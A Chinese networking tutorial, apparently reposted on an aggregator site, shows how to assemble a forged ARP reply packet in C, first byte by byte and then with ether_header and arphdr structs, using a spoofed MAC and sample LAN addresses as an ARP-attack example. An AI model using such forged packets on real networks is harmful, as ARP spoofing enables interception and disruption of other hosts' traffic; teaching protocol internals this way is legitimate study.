IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> 系统运维 -> 网络编程中利用结构体方式组包(以arp攻击为例) -> 正文阅读

[系统运维]网络编程中利用结构体方式组包(以arp攻击为例)

一、逐个元素组包

//msg存放arp应答报文
	unsigned char msg[]={
		/*mac头部(14个字节)*/
		0x70,0x5A,0x0F,0x63,0xF5,0x9D,	 /*目的mac地址(xp的mac))*/
		0x00,0x00,0x00,0x00,0x00,0x00,	 /*源mac地址(伪装的mac)*/
		0x08,0x06,						 /*帧类型*/
		
		/*ARP报文头部(28个字节)*/
		0x00,0x01,						 /*硬件类型*/	
		0x08,0x00,						 /*协议类型*/
		6,								 /*硬件地址长度*/
		4,								 /*协议地址长度*/
		0x00,0x02,						 /*ARP应答*/
		0x00,0x00,0x00,0x00,0x00,0x00,	 /*源ac地址(伪装的mac)*/
		192,168,0,111,				     /*源IP(ubuntu的IP地址)*/
		0x70,0x5A,0x0F,0x63,0xF5,0x9D,	 /*目的mac地址(XP的mac)*/
		192,168,0,110	 			 	 /*目的IP*/
	};

二、利用结构体方式组包

以太网头部
在这里插入图片描述
在这里插入图片描述
ARP头部
使用的时候需要在/usr/include/net/if_arp.h中将arphdr结构体中的#if 0改为1
在这里插入图片描述

//组arp应答报文msg(mac头部+arp头部)
	
	unsigned char dst_mac[6]={0x70,0x5A,0x0F,0x63,0xF5,0x9D,};//目的mac地址(xp的mac))
	unsigned char src_mac[6]={0x00};						  //源mac地址
	unsigned char src_ip[4]={192,168,0,111};				  //源IP
	unsigned char dst_ip[4]={192,168,0,110};                  //目的IP

	unsigned char msg[1024]="";
	//1.组mac头部
	struct ether_header *eth_addr = (struct ether_header *)msg;
	//赋值mac地址
	memcpy(eth_addr->ether_dhost, dst_mac, 6);
	memcpy(eth_addr->ether_shost, src_mac, 6);
	//赋值帧类型
	eth_addr->ether_type = htons(0x0806);
	
	//2.组arp头部
	struct arphdr *arp_head = (struct arphdr *)(msg+14);	//跳过mac头的空间
	arp_head->ar_hrd = htons(1);			//硬件类型
	arp_head->ar_pro = htons(0x0800);		//协议类型
	arp_head->ar_hln = 6;					//硬件地址长度(一个字节不存在大小端,不需要用htons)
	arp_head->ar_pln = 4;					//协议地址长度
	arp_head->ar_op  = htons(2);			//arp应答
	memcpy(arp_head->__ar_sha, src_mac, 6);	//源mac
	memcpy(arp_head->__ar_sip, src_ip, 4);	//源ip
	memcpy(arp_head->__ar_tha, dst_mac, 6);	//目的mac
	memcpy(arp_head->__ar_tip, dst_ip, 4);	//目的ip	
  系统运维 最新文章
配置小型公司网络WLAN基本业务(AC通过三层
如何在交付运维过程中建立风险底线意识,提
快速传输大文件,怎么通过网络传大文件给对
从游戏服务端角度分析移动同步(状态同步)
MySQL使用MyCat实现分库分表
如何用DWDM射频光纤技术实现200公里外的站点
国内顺畅下载k8s.gcr.io的镜像
自动化测试appium
ctfshow ssrf
Linux操作系统学习之实用指令(Centos7/8均
上一篇文章      下一篇文章      查看所有文章
加:2022-05-08 08:30:52  更:2022-05-08 08:33:05 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2025年1日历 -2025/1/4 18:22:28-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码